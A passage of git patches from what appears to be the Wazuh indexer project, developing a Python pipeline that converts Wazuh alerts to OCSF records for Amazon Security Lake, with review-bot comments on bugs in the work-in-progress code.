+# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From a39ef909d11c4941551e63956b4ef7822c745a29 Mon Sep 17 00:00:00 2001 
From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 38/77] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From 97725bcd97667aff3664055447814bf277b6b89d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 39/77] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json 
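Review bot: `ocsf_output['unmapped'] = alert_dictionary` copies the entire original alert into the output, including every field the loop above has already mapped and the raw log line, so each record can carry its payload twice — the `###` comment admits as much. Either strip the mapped leaves from a copy before assigning (`unmapped = copy.deepcopy(alert_dictionary)` and `pop` each mapped dotted path), or document that full duplication is intentional for Security Lake consumers. The start of map_to_ocsf lies outside this hunk.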
@@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" 
: ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
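Review bot: `"severity_id" : "rule.level"` in both schema blocks copies the Wazuh rule level straight into OCSF `severity_id`, which is a small enumeration (the converter in this series documents it as the 0–6 range) rather than a free integer, so rule levels above 6 produce out-of-range severities; a normalization step belongs between the two. The `1.1.0` block also silently drops the `data_sources` and `nist` mappings that `1.0.0` carries, and `metadata.product.version` / `attacks.version` are hard-coded constants that will drift from the installed product. If those omissions are deliberate for 1.1.0, a short comment next to the mapping file would save the next maintainer a diff.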
@@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') 
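Review bot: `ocsf_output = {}` at the top of map_to_ocsf rebinds the out-parameter to a fresh local dict, so the caller's `ocsf_mapped_alert` never receives the mapping and nothing is returned either; drop that line or add `return ocsf_output`. In the same hunk `depth_levels = dotted_destination.split('.')` reads an undefined name (the assignment two lines up is to `dotted_destination_field`), and `len(depth_levels>1)` compares a list with an int before calling `len`, so the function cannot run as written — it should read `if len(depth_levels) > 1:`.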
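Review bot: The context line `map_to_ocsf(alert, mappings, ocsf_mapped_alert):` still ends in a colon, which is a SyntaxError that prevents the whole module from importing, and it does not pass the `ocsfschema` argument the signature in the previous hunk now requires. The indentation fix on `output.append` is fine but moot until that call becomes `map_to_ocsf(alert, mappings, ocsf_mapped_alert, ocsfschema)` with `ocsfschema` threaded through map_block's parameters.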
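Review bot: `--ocsfschema` accepts any string and the value is used as a raw dict key (`mappings[ocsfschema]`), so a typo such as `-v 1.1` surfaces as a KeyError deep inside the mapping loop instead of a usage error. Restrict it with `choices=['1.0.0', '1.1.0']`, or validate it against the keys loaded from `--mapping` right after parsing. Like the neighbouring `-m/-n/-s` options it also lacks `type=`, so numeric values given on the command line arrive as strings.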
@@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From e313572485453506a8dda93711e0168bbcd2dec5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 40/77] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py 
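Review bot: `map_block(stdin, args.linebuffer, mappings,args.ocsfschema)` passes four arguments, but map_block is defined with three (`fileobject, length, mappings`) in the previous hunk, so the first loop iteration raises TypeError. Add the parameter — `def map_block(fileobject, length, mappings, ocsfschema):` — and forward it to map_to_ocsf. Separately, `--linebuffer` has no `type=int`, so a value supplied on the command line is a string and `range(0, length)` fails as well.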
@@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output 
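Review bot: The twenty lines of the old map_to_ocsf should be deleted rather than kept as `#` comments — git history preserves them, and dead code sitting next to the live `ocsf.convert` path invites someone to resurrect the broken version. Also, `s3 = fs.S3FileSystem()` runs at import time, so the AWS S3 subsystem is initialised (and, as far as I can tell, credentials and region resolved) even when the script only writes local files or is imported by a test; construct it lazily inside the code path that actually uploads.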
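Review bot: `map_block(fileobject, length, mappings)` keeps the `mappings` parameter although `ocsf.convert(alert)` no longer uses it, while the caller in main still passes four arguments (`mappings, args.ocsfschema`), so signature and call site disagree. Drop the unused parameter on both sides and delete the commented-out `#map_to_ocsf(...)` line instead of leaving it beside the live call. Whether `convert` is reachable as `ocsf.convert` depends on `ocsf/__init__.py`, which is not in this diff — worth confirming, since the module shown later lives at `ocsf/converter.py`.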
From 4896d159912cdfc627e52eba2ebac3f5790d541e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 41/77] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", 
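Review bot: Every field is read by hard indexing (`event["rule"]["mitre"]["tactic"]`, `event["input"]["type"]`, `event["decoder"]["name"]`), so one alert lacking any of these sub-objects raises KeyError out of convert(), and the caller's loop re-raises it and stops the whole stdin pipeline. Optional blocks — the MITRE data in particular, which the later `"dummy": True` placeholders suggest is not always present — should be read defensively: `mitre = event["rule"].get("mitre", {})` and `"name": join(mitre.get("tactic", []))`. A converter that drops one field is far better than one that drops the stream.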
@@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() 
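Review bot: `event["_index"]` in `unmapped.data_sources` still reads the indexer envelope while every sibling access in this commit dropped `_source`, so once events arrive unwrapped (from Filebeat, per the comment at the top of the file) this line raises KeyError on every record. Use `event.get("_index")` or remove it from `data_sources`. `full_log` and `rule.nist_800_53` are hard-indexed here too and may be absent on some alerts — `.get()` with a default keeps a single malformed event from aborting the run.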
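Review bot: `for line in range(0, length): line = fileobject.readline()` reuses `line` as both the loop counter and the line just read, which is confusing and hides that `length` must already be an int (the `--linebuffer` option has no `type=int`). `for _ in range(length):` says what is meant, and `parquet.write_to_dataset(..., root_path='s3://{}/{}'.format(bucket_name, folder))` in the context lines formats `bucket_name` into a URI without checking it was supplied, so a missing `-b` silently targets `s3://None/...`.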
@@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, 
default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: 
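Review bot: `logging.basicConfig(..., level=logging.DEBUG)` is unconditional, so the `--debug` flag parsed a few lines earlier has no effect and the loop's `logging.debug(json.dumps(output_buffer))` writes every buffered alert — raw log lines included — to `/tmp/stdintosecuritylake.txt`, a fixed, predictable path in a shared directory, by default. Gate it with `level=logging.DEBUG if args.debug else logging.INFO` and default the log file to a directory owned by the service with restrictive permissions. Removing the mapping-file load also leaves `-v/--ocsfschema` and `-x/--mapping` as options that are parsed but never read; either drop them or mark them reserved in the help text.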
@@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From 7fd25d1213e605ceac965eb3eb31395c05072b3f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 42/77] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py 
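Review bot: `output_buffer.append(current_block)` appends the whole block list as a single element, so the buffer ends up mixing dict rows with nested lists, and when the block ended with the `block_ending` sentinel that sentinel dict is appended as well; `Table.from_pylist` will either fail on the mixed rows or encode `{"block_ending": true}` as a record. The non-sentinel case should extend the buffer, `output_buffer += current_block`, and the sentinel branch should not fall through to the append at all. `encode_parquet` is also called with `args.bucketname`, which is None unless `-b` was given.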
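Review bot: `raise` re-raises the exception, so the `exit(1)` that follows is unreachable and should go. Inside the `except` block, `logging.exception("Error running script")` records the message and the traceback in one call and replaces both `logging.error` lines, which is more useful for incident triage than `str(e)` alone.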
@@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + 
return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys 
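Review bot: `severity_id` is set from `normalize(event["_source"]["rule"]["level"])`, but normalize() still returns its input unchanged (`return level` under `# TODO normalization`) while its own docstring says OCSF requires the 0–6 range, so every rule level above 6 produces an out-of-range severity in the Parquet output. A minimal clamp — `return min(max(int(level), 0), 6)` — or a proper level-to-severity table should land before this converter writes production data. Two smaller things in the same hunk: `"vendor_name": "Wazuh, Inc,."` has a stray comma, and the `"dummy": True` placeholders in `attacks.tactic`/`attacks.technique` will be emitted to Security Lake as real fields unless removed.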
@@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': 
